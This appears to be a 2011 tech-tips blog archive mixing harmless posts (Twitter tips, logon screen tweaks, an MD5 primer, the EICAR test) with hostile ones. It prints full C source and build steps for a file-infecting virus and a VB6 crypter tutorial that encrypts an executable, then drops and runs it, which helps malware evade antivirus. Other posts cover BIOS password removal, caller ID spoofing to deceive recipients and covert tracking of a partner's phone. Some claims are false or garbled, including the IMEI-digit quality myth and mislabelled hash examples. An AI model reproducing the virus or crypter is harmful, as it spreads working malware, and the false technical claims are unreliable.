Related Post

.
Showing posts with label Tips 'n' Tricks. Show all posts
Showing posts with label Tips 'n' Tricks. Show all posts

Wednesday, 12 October 2011

6 Tips For Best Usage of Twitter For Blogging Success

Blogging is all about getting huge readers for your articles on your blog. Twitter is the effective media, if you use it effectively. Twitter has millions and millions of users, most of them use from their mobile device. If you do magic on your article, then you can’t even think of the amount of traffic which Twitter will send to you. Here are some of the tips useful for achieving great success in your blogging career.

Content


First of all your content matters. If your content is attractive and it will solve someone’s problem or motivate someone to achieve something, then that article will be shared on Social Medias like Facebook, Twitter, Digg, Stumbleupon and others. So, keep in mind that here also content is king.

Title

Yes, if your title is catchy and attracts one’s eyes, then you will get the traffic easily in Twitter.  Do not write boring and lengthy title, use small, accurate and focused title for your posts. Do not use different title for your articles, which are not related to your posts. For example- do not use “here is the complete tips for you about writing quality articles in your blog”. Instead of this write something like “Best Tips to write quality articles in blogs”, which is simple and tells everything about your article and catchy too. Isn’t it?
Timings: Do not write outdated topics in your blogs, which are already finished its era. Yu should include new things in your articles and title also. If you select the old topics to write about, then make it extraordinary and use some of your unique ideas in that. Here I selected the old topic, but isn’t it catchy? Isn’t it got some real tips?

Hashtags

Hashtags are symbolized as “#” before any word in twitter, which means that, if you use #blog in your twitter post, all Twitter users who will search #blog in twitter, will get your tweets. Similarly check which one is latest trend in Twitter and use hashtags accordingly and make sure, it is related to your article and title. This will get more followers for your Twitter profile also.

Twitter Buttons

This is the important step. You should place Twitter button in your blog in a good visible area. Your chance of getting your post tweeted is more when reader finds your button in visible place. Before post and after post is the right place to have the Tweet Button.
If you follow all of these steps, then it will automatically brings you traffic as well as your follower count will also increases. Is there anything I left here? If you find any interesting fact and information about using Twitter effectively for blogging, then please share in the comments field below.

Tuesday, 27 September 2011

Download Windows 8 Developer Preview

Microsoft has released its Windows 8 Developer Preview operating system, for PCs and tablets, to the public as a free download.
Microsoft has made available three different versions of Windows 8 for download (two versions built for 64-bit systems which use new processors and can make use of more RAM, versus older 32-bit PCs that use earlier chips and less memory), which all show up as an ISO file when downloaded.




Official Microsoft Download Links:-

Windows Developer Preview with Developer tools English, 64-bit (x64)

Windows Developer Preview without Developer tools English, 64-bit (x64)

Windows Developer Preview English, 32-bit (x86)

Download : Google+ Android Application

Anroid has lanched  "Google +Android Application for  "Google +" Lover .So they can also access Google + from there Android Mobile.This application will work in 2.1 and greater version.Check it’s features.

Features :-

  • Circles let you share the right things with just the right people.
  • Stream is where you can get updates from your circles or see what people are saying about things nearby.
  • Instant Upload automatically uploads videos and photos to your own private album in the cloud, to make sharing a snap.
  • Huddle is super-fast group messaging for everyone in your circles.

Download 

Angry Birds Shortcut Keys For Windows

Angry Birds is world most popular game . In this post i have listed some shortcut key of Angry Birds Game. If you want to Download Full Version of Angry Bird Rio Click Here .






Shortcut Keys :-
  • Scrollwheel – Zoom in
  • P – Pause
  • R – Restart the current level
  • S – Sounds Mute and unmute
  • Escape – sidebar menu
If you Know More Shortcut key Do Comment.

Saturday, 17 September 2011

How to get your computer to have an FBI login screen


1) Download LogonStudios (It's Vista version but if you have Windows 7 it works)

Code:
http://www.megaupload.com/?d=I8DIQ2YN

For xp users:
Code:
http://www.stardock.com/products/logonstudio/downloads.asp

2) You can download the FBI file here

Code:
http://www.wincustomize.com/explore/logonstudio_xp/9606/

Or

Code:
http://skins19.wincustomize.com/24/79/2479496/26/9859/preview-26-9859.jpg

Optional
3) The switch user button was annoying me so i downloaded this to remove it.
Code:
http://www.megaupload.com/?d=8N0EGIW4

Start it up, then open it and it'll do the rest

For the users that want their 'switch user' button back download this:
Code:
http://www.megaupload.com/?d=AA5V5SFQ
 
Just run the file and it will return your button. That's it enjoy Grin

Tuesday, 13 September 2011

Best way to Crack the BIOS password



There are a lot ways to Crack theBIOSpassword. This is one of them but I would say that this one ismoreeffective than the rest because the rest of the ways does notGuaranteeyou that it will Crack the BIOS password while in this casetheCracking is Guaranteed since in this we will remove thefunctionalityof password protection of the BIOS.

Follow the steps below:
[eminimall]


1) Boot up windows.

2) go to dos-prompt or go to command prompt directly from the windows start up menu.

3) type the command at the prompt: “debug” (without quotes ninja.gif )

4) type the following lines
now exactly as given…….
o 70 10
o 71 20
quit
exit

5) exit from the dos prompt and restart the machine
password protection gone!!!!!!!!!!!!!


Enjoy

PS: I tested this in Award Bios……..

There seems to be some issue regarding display drivers on some machines if this is used. Just reinstall the drivers, Everything will be fine………..

I have not found any other trouble if the codes are used.

To be on safe side, just back up your data.

The use of this code is entirely at ur risk.

It worked fine for me.

 SOURCE: My 1st Website

Hack BSNL Broadband for Speed

If you are a BSNL broadband user, chances are that you are facingfrequent DNS issues. Their DNS servers are just unresponsive. The lookup takes a long duration and many times just time out. The solution?There is small hack on BSNL for this. Use third party DNS serversinstead of BSNL DNS servers or run your own one like djbdns. The easiest options is to use OpenDNS. Just reconfigure your network to use the following DNS servers:
208.67.222.222
208.67.220.220

 
Detailed instructions specific to operating system or your BSNL modem are available in the
OpenDNS website itself. After I reconfigured my BSNL modem to use theabove 2 IP addresses, my DNS problems just vanished! Other ‘freebies’that come with OpenDNS are phishing filters and automatic URLcorrection. Even if your service provider’s DNS servers are workingfine, you can still use OpenDNS just for these two specialfeatures.After you hack BSNL DNS servers, you will see a noticeable improvement in your broadband speed.

How to Spoof Caller ID ? Caller ID Spoofing


Caller ID spoofing is the act of making the telephone network todisplay any desired (Fake) number on the recipient’s Caller IDdisplay unit instead of the original number. The Caller ID spoofing canmake a call appear to have come from any phone number that the callerwishes.Have you ever wondered how to perform Caller ID spoofing? Read on toknow more information on Caller ID spoofing and find out how it isperformed.
Unlike what most people think, an incoming call may not be from thenumber that is displayed on the Caller ID display unit. Because of thehigh trust that the people have in the Caller ID system, it is possiblefor the caller to easily fool them and make them believe thatthe number displayed on the Caller ID display is real. This is allpossible through Caller ID spoofing.
How to Spoof Caller ID? 

You can easily spoof any Caller ID using services like SpoofCard. Inorder to use the spoofcard service, you need to pay in advance andobtain a PIN (Personal Identification Number) which grants accessto make a call using the Caller ID spoofing service. Once you havepurchased the service, you will be given access to login to yourSpoofCard account. To begin with, you need to call the number given bySpoofCard and enter the PIN. Now you will be given access to enter thenumber you wish to call and the number you wish to appear as the CallerID. Once you select the options and initiate the calling process, thecall is bridged and the person on the other end receives your call. Thereceiver would normally assume that the call was coming from adifferent phone number ie: the spoofed number chosen by you - thustricking the receiver into thinking that the call was coming from adifferent individual or organization than the caller’s. In this way itis just a cakewalk to spoof Caller ID and trick the receiver on theother end. Thus you neither need to be a computer expert nor have anytechnical knowledge to perform Caller ID spoofing. For more informationon SpoofCard service visit the following link.

SpoofCard


How Caller ID Spoofing works?

Caller ID spoofing is done through various methods and usingdifferent technologies. The most commonly used technologies to spoofCaller ID is VOIP (Voice Over IP) and PRI (Primary Rate Interface) lines.
Today most VOIP systems provide an option for it’s users to enterwhatever number they want in the calling party field and this number issent out when they make a call. Hence it is easily possible for anyuser to spoof Caller ID provided they have a VOIP system and know howto properly configure it to spoof the Caller ID. However sites like SpoofCard provide an easy and cheap spoofing services for those who aren’t using VOIP systems that they can configure themselves.

Caller ID spoofing is possible and being performed right from thedays Called ID system was introduced. However most people are unawareof the fact that it is possible to spoof  Caller ID and make any numberto be displayed on the receiver’s end. In the past, Caller ID spoofingservice was mostly used by telemarketers, collection agencies,law-enforcement officials, and private investigators but today it isavailable to any Internet user who wish to perform Caller ID spoofing.

Is your Nokia Cell Phone Original ?


Nokia is one of the largest selling phones across the globe.Most ofus own a Nokia phone but are unaware of it’s originality.Are you keento know whether your Nokia mobile phone is original or not? Then youare in the right place and this information is specially meant for you.Your phones IMEI (International Mobile Equipment Identity) number confirms your phone’s originality.

Press the following on your mobile *#06# to see your Phone’s IMEI number(serial number).
Then check the 7th and 8th numbers

Phone serial no. x x x x x x ? ? x x x x x x x


IF the Seventh & Eighth digits of your cell phone are 02 or 20 this means your cell phone was assembled in Emirates which is very Bad quality

IF the Seventh & Eighth digits of your cell phone are 08 or 80 this means your cell phone was manufactured in Germany which is fair quality

IF the Seventh & Eighth digits of your cell phone are 01 or 10 this means your cell phone was manufactured in Finland which is very Good

IF the Seventh & Eighth digits of your cell phone are 00 this means your cell phone was manufactured in original factory which is the best Mobile Quality

IF the Seventh & Eighth digits of your cell phone are 13 this means your cell phone was assembled in Azerbaijan which is very Bad quality and also dangerous for your heal

How to Create a Computer Virus?




This program is an example of how to create a virus in C. This programdemonstrates a simple virus program which upon execution (Running)creates a copy of itself in the other file. Thus it destroys otherfiles by infecting them. But the virus infected file is also capable ofspreading the infection to another file and so on. Here’s the sourcecode of the virus program.

#include<stdio.h>
#include<io.h>
#include<dos.h>
#include<dir.h>
#include<conio.h>
#include<time.h>FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;
void main()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}




COMPILING METHOD: USING BORLAND TC++ 3.0 (16-BIT):

1. Load the program in the compiler, press Alt-F9 to compile
2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9,THIS WILLINFECT ALL THE FILES IN CUR DIRECTORY INCLUDIN YOUR COMPILER)
3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR IT’S SIZE)
4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT)
5. Once again follow the STEP 1 & STEP 2.Now the generated EXE File is ready to infect


USING BORLAND C++ 5.5 (32-BIT) :

1. Compile once,note down the generated EXE file length in bytes
2. Change the value of X in source code to this length in bytes
3. Recompile it.The new EXE file is ready to infect

HOW TO TEST:

1. Open new empty folder
2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH & PASTING IN THE NEW FOLDER)
3. Run the virus EXE file there you will see all the files in the current directory get infected.
4. All the infected files will be ready to reinfect

That’s it

WARNING: FOR EDUCATIONAL PURPOSES ONLY. DO NOT SPREAD OR MISUSE THIS VIRUS CODE

How to Test the Working of your Antivirus ? EICAR Test.


Have you ever wondered how to test your Antivirus software to ensureit’s proper working? Well here is a quick and easy way to test yourantivirus. The process is called EICAR test which will work on anyantivirus and was developed by European Institute of Computer Antivirus Research.This process can be used by people, companies and antivirus programmersto test the proper functioning of the antivirus/antimalware software without having to deal with the real computer virus which can causedamage to the computer. Here is a step-by-step procedure to test yourantivirus.

1. Open a notepad (New Text Document.TXT) and copy the following code exactly onto it, and save the notepad.
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*


2. Rename the file from New Text Document.TXT to myfile.com
3. Now run the antivirus scan on this myfile.com file.
If the antivirus is functioning properly on your computer, then itshould generate a warning and immediately delete the file upon scanning. Otherwise you may have to re-install your antivirus.


NOTE: Most antivirus will pop-out a warning message in the Step-1 itself

You can also place the myfile.com file in a ZIP or RAR file and run ascan on it so as to ensure whether your antivirus can detect the teststring in the compressed archive. Any antivirus when scanning this filewill respond exactly as it will do for a genuine virus/malicious code.This test will cause no damage to your computer even though theantivirus will flag it as a malicious script. Hence it is the safestmethod to test the proper functioning of any antivirus.


What is MD5 Hash and How to Use it?



In this post I will explain you about one of my favorite and interesting cryptographic algorithm called MD5 (Message-Digest algorithm 5).This algorithm is mainly used to perform file integrity checks undermost circumstances. Here I will not jump into the technical aspects ofthis algorithm, rather will tell you about how to make use of thisalgorithm in your daily life. Before I tell you about how to use MD5, Iwould like to share one of my recent experience which made me startusing MD5 algorithm.

Recently I made some significant changes and updates to my website andas obvious I generated a complete backup of the site on my server. Idownloaded this backup onto my PC and deleted the original one on theserver. But after a few days something went wrong and I wanted torestore the backup that I downloaded. When I tried to restore thebackup I was shocked! The backup file that I used to restore wascorrupted. That means, the backup file that I downloaded onto my PCwasn’t exactly the one that was on my server. The reason is that thereoccured some data loss during the download process. Yes, this dataloss can happen often when a file is downloaded from the Internet. Thefile can be corrupted due to any of the following reasons.

  • Data loss during the download process, due to instability in the Internet connection/server
  • The file can be tampered due to virus infections or
  • Due to Hacker attacks
So whenever you download any valuable data from the Internet itiscompletely necessary that you check the integrity of thedownloadedfile. That is you need to ensure that the downloaded file isexactlythe same as that of the original one. In this scenario the MD5hash canbecome handy. All you have to do is generate MD5 hash (orMD5check-sum) for the intended file on your server. After you downloadthefile onto your PC, again generate MD5 hash for the downloadedfile.Compare these two hashes and if it matches then it means that thefileis downloaded perfectly without any data loss.

A MD5 hash is nothing but a 32 digit hexadicimal number which can be something as follows


A Sample MD5 Hash
e4d909c290d0fb1ca068ffaddf22cbd0

This hash is unique for every file irrespective of it’s size andtype. That means two .exe files with the same size will not have thesame MD5 hash even though they are of same type and size. So MD5hash can be used to uniquely identify a file.


How to use MD5 Hash to check the Integrity of Files? 
Suppose you have a file called backup.tar on yourserver. Before you download, you need to generate MD5 hash for thisfile on your server. To do so use the following command.


For UNIX:


md5sum backup.tar

When you hit ENTER you’ll see something as follows


e4d909c290d0fb1ca068ffaddf22cbd0

This is the MD5 hash for the file backup.tar. Afteryou download this file onto your PC, you can cross check it’s integrityby again re-generating MD5 hash for the downloaded file. If both thehash matches then it means that the file is perfect. Otherwise it meansthat the file is corrupt. To generate the MD5 hash for thedownloaded file on your Windows PC use the following freeware tool

DOWNLOAD IT

I hope you like this post. For further doubts and clarifications please pass your comments. Cheers!
  
SOURCE: My 1st Website

How to Change the Logon Screen Background in Windows 7

How would you like to change the logon screen background in Windows7 so as to give your Windows a customized look and feel? With a smalltweak it is possible to customize the Windows 7 logon screen and setyour own picture/wallpaper as the background. Changing logon screenbackground in Windows 7 is as simple as changing your desktopwallpaper. Well here is a step by step instruction to customize thelogon screen background.


1. The image you need to set as the background should be a .jpg file and it’s size should not exceed 245KB.

2. The image resolution can be anything of your choice. However I prefer 1440 x 900 or 1024 x 768.You can use any of the photo editing software such as Photoshop to compress and set the resolution for your image. Once you’re done,save this image as backgroundDefault.jpg.

3. You will need to copy this image to

C:\Windows\system32\oobe\info\backgrounds

You will need to create that path if it does not already exist on your computer.

4. Now open the Registry Editor (Start -> Run -> Type regedit) and navigate to the following key
HKLM\Software\Microsoft\Windows\CurrentVersion\Authentication\
LogonUI\BackgroundIf

Background does not exist rightclick LogonUI, select New and then Key, and then name it Background. Now locate OEMBackground (listed on the right side). If it does not exist, right-click Background and select New and then DWORD and name it OEMBackground.

5. Double-click on OEMBackground and set the Value Data to 1.

6. Now log-off to see the new logon screen background. If you wouldlike to revert back to the default background, just set the Value Databack to 0.

I hope you like this trick.

Just try out and give your feedback!

SOURCE: My 1st Website

Saturday, 10 September 2011

All Facebook Chat Emoticons Smileys

Get all the Facebook emoticons you want right here. Use the Facebook smileys and emoticons while reconnecting with friends and family on the most popular social networking site online. Emoticon smileys can be used in Facebook chat conversations. Each emoticon appears by writing the shortcut into the chat box. Learn them all here along with the shortcuts for Facebook emoticons.

Here is the list of all Facebook Smileys Emoticons and their shortcuts:



Emoticon Name Shortcut

smile smile :-) :) :] =)
tongue tongue :-P :P :-p :p =P
wink wink ;-) ;)
grin grin :-D :D =D
curly lips curly lips :3
kiss kiss :-* :*
grumpy grumpy >:( >:-(
glasses glasses 8-) 8) B-) B)
sunglasses sunglasses 8-| 8| B-| B|
upset upset >:O >:-O >:o >:-o
confused confused o.O O.o
shark shark (^^^)
gasp gasp :-O :O :-o :o
pacman pacman :v
squint squint -_-
devil devil 3:) 3:-)
unsure unsure :/ :-/ :\ :-\
frown frown :-( :( :[ =(
cry cry :'(
Putnam Chris Putnam   :putnam:
robot robot :|]
heart heart <3
angel angel O:) O:-)
kiki kiki ^_^
penguin facebook emoticon penguin <(“)

Chatting is about to get that much more fun with Facebook chat emoticons. Use them to talk to your family members, your classmates or a childhood friend you just reconnected with from years back. Facebook emoticons make the reunion even sweeter while communicating online. Emoticons for Facebook are a great way to express what you’re feeling without having to use words so use all the Facebook emoticons to your advantage!

Smileys and emoticons can add a hint of personality to the message you’re sending and maybe even some humor. If you happen to be at a loss for words, insert an emoticon. There are different variations the emoticons can be used for but they all generally follow the same rules. We provide you with access to a complete list of Facebook smileys along with their meanings.

Facebook Symbols

There are a couple of ways in which people network with friends on Facebook. One way is by conversing with friends through the chat interface of the site online and the other way is by writing messages on the Facebook wall as it is the most visible place to followers and friends on the site. While you could make use of Facebook emoticons smileys to improve your experience of chat, you cannot do this on posts on the wall. Instead of tradition emoticons, here people use facebook symbols. Facebook Symbols are Unicode encoded special text characters that people use to decorate their status, comments and messages. We have collected some special facebook symbols that you can copy and paste on facebook.

Saturday, 3 September 2011

Trace Anyones Mobile with G.P.S. and without G.P.S.

Do you doubt on your Boyfriend/Girlfriend ? Do you wanna track them via mobile location? This is now possible...I'm not joking. Many of us think that this is not possible or we have to spend some money for such services but believe me that we don’t have to spend any money for getting this done.  Yes, PhoneOnMap makes it possible, which provides a free application that has to be installed in G.P.S. cell phone and you are ready to track the phone from anywhere on the Internet.

This application can be useful for office work as well as family members. You can track your child as well as your girlfrend/wife too (:P) . This PhoneOnMap can be used worldwide and you can use it while travelling too. The data is stored on the company’s server for a period of one month. This can be an invaluable source for sales and marketting department of an organization to track the marketing agents.

If you are worried about the security and privacy of the service, let me tell that it is very secure and your cell phone can not be monitored by any Unauthorized User as in order to access the tracking system, you have to authenticate yourself through a personal code which was used as identification while installingapplication on cell phone.

Features of  GPS cell phone tracking system :-

1. GPS cell phone tracker and locater will not work in the underground transportation .
2. The application does not work when the phone is turned off.
3. The data transmission outside provider’s coverage area will add roaming charges like any other phone service charge us .
4. Once application is uninstalled from cell phone than you can’t do anything .
5. On internet tracking system will show cell phone location between every 10 seconds to 10 minutes , which is depend on setting .

Accordng to me this kind of service is very important for parents to track their children and from a business usage point of view an invaluable part of companies involved in supply and delvery system like Courrier and Home delivery system. This will help them to get a realtime location of the object and provide an accurate timeframe for the delivery.

As of now this service does not provide the exact pin point location but the location determined s in the range of 10-20 meters. However with little intelligence the exact location can be easily determined especially when you wish to track your children or the cheating boyfriend/girlfrend…(lol)

Tuesday, 30 August 2011

How To Make a CRYPTER ?

How To Make a crypter ?
What you will need:
Visual Basic 6 or Visual Basic 6 Portable
A RC4 module
A brain


The RC4 module and Visual Basic 6 Portable will have the download links at the end of this tutorial.

TABLE OF CONTENTS:
1. Introduction
2. Building your crypter
3. Conclusion

1. Introduction

RC4:
In cryptography, RC4 (also known as ARCFOUR or ARC4 meaning Alleged RC4, see below) is the most widely used stream cipher and is used in protocols such as Secure Sockets Layer (SSL) (to protect Internet traffic) and WEP (to secure wireless networks).

Stub:
A method stub or simply stub in software development is a piece of code used to stand in for some other programming functionality. A stub may simulate the behavior of existing code (such as a procedure on a remote machine) or be a temporary substitute for yet-to-be-developed code. Stubs are therefore most useful in porting, distributed computing as well as general software development and testing.

Builder:
A builder is usually the client to make/do something to a file, and it is supposed to go with a stub. The builder usually allows the stub to simulate the behaivor of existing code, and than it makes the file/does something to a file.

2. Building your crypter.

Now, open up Visual Basic 6 or Visual Basic Portable. To make the task easier, open two Visual Basic 6 programs. One is going to be the builder, and one is going to be the stub.

Now, lets start on the builder. Add a RC4 module, and lets go on. First of all, add one label that says "File Path:", a text box right beside "File Path:", a button that says "Browse" or "...", and another button that says "Crypt" or "Build". Now, lets add the CommonDialog control. Add a CommonDialog and name it commondlg. Now, lets double click the button that says "Browse" or "...". Add this code, and I'll explain it.



Code:
With commondlg 'CommonDialog1.
     .Filter = "Executable files | *.exe" 'The file used for crypting. (*.exe)
     .DialogTitle = "Please select a executable file..." 'The title of the dialog.
     .ShowOpen 'Show the dialog.
     End With
     TextBox1.Text = commondlg.FileName 'Make TextBox1.Text as the selected filename.

The With commondlg command calls CommonDialog1.
The .Filter part allows you to choose what files you only want to be selected.
The .DialogTitle command is the title of the dialog (the prompt that tells you which file you want to select for crypting).
The .ShowOpen command shows the dialog.
End With will end CommonDialog1.
And finally, the TextBox1.Text = commondlg.FileName command makes TextBox1.text show the selected filename.

Now, click the button that says "Build" or "Crypt". Add this code. It explains it, so please take time to read what it says.
Code:
Dim sStub As String, sFile As String 'This command will declare the two strings.
Open App.Path & "\stub.exe" For Binary As #1 'Opens up the stub.
sStub = Space(LOF(1)) 'This declares the space.
Get #1, , sStub 'This puts in a space in the file.
Close #1 'This closes the file.

Open TextBox1.Text For Binary As #1 'Opens up the stub.
sFile = Space(LOF(1)) 'This declares the space.
Get #1, , sFile 'This puts a space in the file.
Close #1 'This closes the file.

Open App.Path & "\output.exe" For Binary As #1 'This creates the crypted file as "output.exe".
Put #1, , sStub & FileSplit & RC4(sFile, Pass) 'This adds the option FileSplit and the RC4 option.
Close #1 'This closes the file.

MsgBox ("File crypted successfully!") 'This is the prompt to show the message that the program successfully crypted the file.

Now, you might have an error that will show you that FileSplit and Pass is not declared. To do so, we will add the declarations on the top of the coding.

Code:
Const FileSplit = "<@#@>" 'The file split.
Const Pass = "s0rasRC4Tutorial" 'The RC4 password.

For this tutorial, we will be using "s0rasRC4Tutorial" as the RC4 password.

Now, lets start on the stub. Add the RC4 module, and make a new module called modMain. Add this code in modMain:
Code:
Const FileSplit = "<@#@>" 'The file split.
Const Pass = "s0rasRC4Tutorial" 'The RC4 password; It must be the same as the one on the builder!

Public Declare Function ShellExecute Lib "Shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpszOp As String, ByVal lpszFile As String, ByVal lpszParams As String, ByVal LpszDir As String, ByVal FsShowCmd As Long) As Long 'Calls the ShellExecute command.

Public Sub Main() 'The main part of the stub.
Dim sStub As String, sFile As String 'This will declare the strings again, just like we did on the builder.
Open App.Path & "\" & App.EXEName & ".exe" For Binary As #1 'Opens up the selected .exe file.
sStub = Space(LOF(1)) 'This will declare the space.
Get #1, , sStub 'This puts a space in the file.
Close #1 'This closes the file.

sFile = Split(sStub, FileSplit)(1) 'This will split the file and the stub.
Open Environ("tmp") & "\decrypted.exe" For Binary As #1 'This will make a decrypted file in the RC4 folder.
Put #1, , RC4(sFile, Pass) 'This will add the RC4 password to the file with the selected RC4 password.

Call ShellExecute(0, vbNullString, Environ("tmp") & "\decrypted.exe", vbNullString, vbNullString, 1) 'Calls the ShellExecute command and drops the decrypted file in the temporary files folder.

End Sub 'This ends "Public Sub Main()".

The code will be teaching you. Once you're done, remove the Form1.

3. Conclusion
I hope you liked this tutorial, and I hope you learned a lot about crypting with RC4!

Visual Basic 6 Portable: http://www.mediafire.com/?tgicg4hn1n5
RC4 module: http://www.freevbcode.com/ShowCode.asp?ID=4398

What is Cryptography? An Intro..!!

This is an article over some common forms of encryption and some examples of what they look like.

Cryptography-
Cryptography is often associated to encryption, or hiding information from others except the desired party. This usually involves having a certain knowledge of the encryption, also known as a key. This has been used for centuries by military and governments to hide and transfer data. For example, In ancient days, One King would shave a subjects head, then tattoo the message on the subjects head. This way the subject did not know what the message was either. Then, after his hair grew back, he would be sent to the other king and his head would be shaved, then when the king had the message, the subject was killed and the message was disposed of. So, step by step this is the general way an encryption works. First, find a viable way to hide the message. Second, Find a safe way to transport the message and, third decrypt the message. Now inside of each step there is a good amount of detail.

Encrypting the message-
There are many common ways to encrypt data. For instance, a shift cipher. In shift cipher you shift each letter a certain amount of letters in the alphabet. EXAMPLE: In a cipher with a key of one, you would switch each letter one letter in the alphabet. So A would become B, and a word like HIDDEN would become IJEEDO. Thus rendering the message illegible. Now the reason you would not want to use a simple shift cipher is because of how easy it is to "crack" the encryption. "Cracking" an encryption is basically brute forcing the key, or by gaining the key through other means such as: Trojans, Social Engineering or one of the other many ways. As for our shift cipher, also known as a "caeser cipher" if it is a shift of three or as ROT-13 if it is a 13 letter shift, It would be very easy to just decrypt the message by hand or to write a simple program that can decrypt the massage in mere moments.


The Difference Between Hashing And Encrypting-
Encryption is a scheme where an plaintext is made into ciphertext using a secure key. The security of the ciphers reside in the key length and decryption process is a difficult without proper knowledge of the key.

As for hashing, The best way to describe a has is a one-way function that compresses arbitrary length strings into fixed short strings. Hashes can be designed using block ciphers using a secret key as a parameter along with the message that has to be hashed or with out them (dedicated hash functions MD4,MD5,SHA-1 etc..).

Here I will describe a few common hashes, Along with why the are not secure, And some examples of what they look like.

MD5 (Message-Digest algorithm 5)-
MD5 was created in 1991 in order to replace the less secure MD4. Although a serious flaw was found in this form of encryption it is still widely used. Cryptographers Suggest the use of more secure algorithms such as SHA-1, or WhirlPool. MD5 is a 128 but hash which makes it rather small and thus makes it vulnerable to the birthday attack (which I will include at the end). The algorithm for MD5 is also open source which makes this form of encryption rather easy to break. Not only those but Md5 hashes are also vulnerable to man-in-the-middle attacks, and gain the first three characters, Enabling easier brute forcing on the hash.

Here are some examples of An MD5 hash:
Hidden: 662f707d5491e9bce8238a6c0be92190
Hellboundhackers: 07113826bfa7f58ef0ccf537ab9b5d0e

And here is the pseudo-code for it

Source: Wikipedia
//Note: All variables are unsigned 32 bits and wrap modulo 2^32 when calculating
var int[64] r, k

//r specifies the per-round shift amounts
r[ 0..15] := {7, 12, 17, 22, 7, 12, 17, 22, 7, 12, 17, 22, 7, 12, 17, 22}
r[16..31] := {5, 9, 14, 20, 5, 9, 14, 20, 5, 9, 14, 20, 5, 9, 14, 20}
r[32..47] := {4, 11, 16, 23, 4, 11, 16, 23, 4, 11, 16, 23, 4, 11, 16, 23}
r[48..63] := {6, 10, 15, 21, 6, 10, 15, 21, 6, 10, 15, 21, 6, 10, 15, 21}

//Use binary integer part of the sines of integers (Radians) as constants:
for i from 0 to 63
k[i] := floor(abs(sin(i + 1)) × (2 pow 32))

//Initialize variables:
var int h0 := 0x01234567
var int h1 := 0x89ABCDEF
var int h2 := 0xFEDCBA98
var int h3 := 0x76543210

//Pre-processing:
append "1" bit to message
append "0" bits until message length in bits = 448 (mod 512)
append bit /* bit, not byte */ length of unpadded message as 64-bit little-endian integer to message

//Process the message in successive 512-bit chunks:
for each 512-bit chunk of message
break chunk into sixteen 32-bit little-endian words w[i], 0 = i = 15

//Initialize hash value for this chunk:
var int a := h0
var int b := h1
var int c := h2
var int d := h3

//Main loop:
for i from 0 to 63
if 0 = i = 15 then
f := (b and c) or ((not b) and d)
g := i
else if 16 = i = 31
f := (d and b) or ((not d) and c)
g := (5×i + 1) mod 16
else if 32 = i = 47
f := b xor c xor d
g := (3×i + 5) mod 16
else if 48 = i = 63
f := c xor (b or (not d))
g := (7×i) mod 16

temp := d
d := c
c := b
b := b + leftrotate((a + f + k[i] + w[g]) , r[i])
a := temp

//Add this chunk's hash to result so far:
h0 := h0 + a
h1 := h1 + b
h2 := h2 + c
h3 := h3 + d

var int digest := h0 append h1 append h2 append h3 //(expressed as little-endian)

SHA-1 -
SHA stands for Secure Hash Algorithm. This algorithm makes a 160 but algorithm. SHA-1 is only one of the many SHA-* styles, but it the most common and most secure. Some other SHA styles are: SHA-224, SHA-256, SHA-384, and SHA-512. These make a hash that is the amount of bits in their name. For example, SHA-224 is a 224 bit hash. The reason that this form of encryption is insecure is because a modified version of a collision attack can be performed and through this method you can get up to a quarter of the hash into plaintext. Thus making it cracked in principle.

Here are some examples of SHA hashes:

Hidden- 7acdf85c69cc3c5305456a293524386e
Hellboundhackers- 07113826bfa7f58ef0ccf537ab9b5d0e

SHA-2 and the others have no attacks reported, but SHA-1 has an attack based on a mathematical system that allows it to be cracked. Even though the others have no reported attacks, SHA-3 is in the making. This one will be the standard SHA in 2012, after the competition is over. This competition takes place from 2008-2011.

Common Encryption:

Binary-
Binary is a base-2 "language" used in computing to specify either on (1), or off (0). This was commonly used to make plaintext hidden from most people. Binary uses an 8-bit per character format that is very easily noticed by almost anyone, considering that is consist solely of 0's and 1's. These can be easily broken with a copy of any ASCII chart or a very easily written program. One other reason that it is not used, besides its insecurities, is the fact of how much space it takes to store a binary encryption, and how long it takes to encrypt things into binary. Think of it this way, For every one character of plaintext, there are 8 in binary. This means a relative large file will not only take a long time to encrypt, It will also be a massive file to transfer.

DES -

DES is based on a symmetrical key algorithm that has a 56 bit key. Now this is the chief reason that this form of encryption is so insecure is the rather small size of the key. There are public programs that can break a DES encryption in 22 hours and 15 minutes. These have made the US along with many other countries turn to more secure means of encryption.

Examples:

Hidden: CREAE8aHr13jY
Hellboundhackers: CRNg1HW8ckWJk

Base 64- Base 64 uses 64 printable ASCII characters to encrypt data. The characters are A-Z, a-z, and 0-9. Then The other two vary from OS to OS. Sometimes this also includes a suffix of an = operator. Base 64 is often very easily identified and can easily be deciphered with an easily accessible algorithm to decrypt it.

Hidden: SGlkZGVuIA==
Hellboundhackers: SGVsbGJvdW5kaGFja2Vycw==

And there are many many others.

Creating your own:

So you think you may want to create a more secure encryption method? Well your in for a surprise at how challenging it really is. First you have to come up with your encryption style... rather it be algorithm based or something else. Then, you must decide on transferring the Key and how. This must also be secure. Then on decrypting the cipher.
Well one problem you will face is what is a secure algorithm and what is not. The more advanced the algorithm does not mean a more secure encryption. Also another problem is how fast the program can do the algorithm. An advanced algorithm may be secure, but if it takes three days to decrypt with the key, Is it worth using? And then with the key, there are a few ways to transfer the key safely. One way is like the spy movie, a guy with a briefcase handcuffed to his wrist. A more feasible way would be to meet the person and exchange it. or you could just use a more common encryption method and send it to them in e-mail. Or one last slow way would be to Mail them the key. Either way you must decide how you will keep it secure on the way.

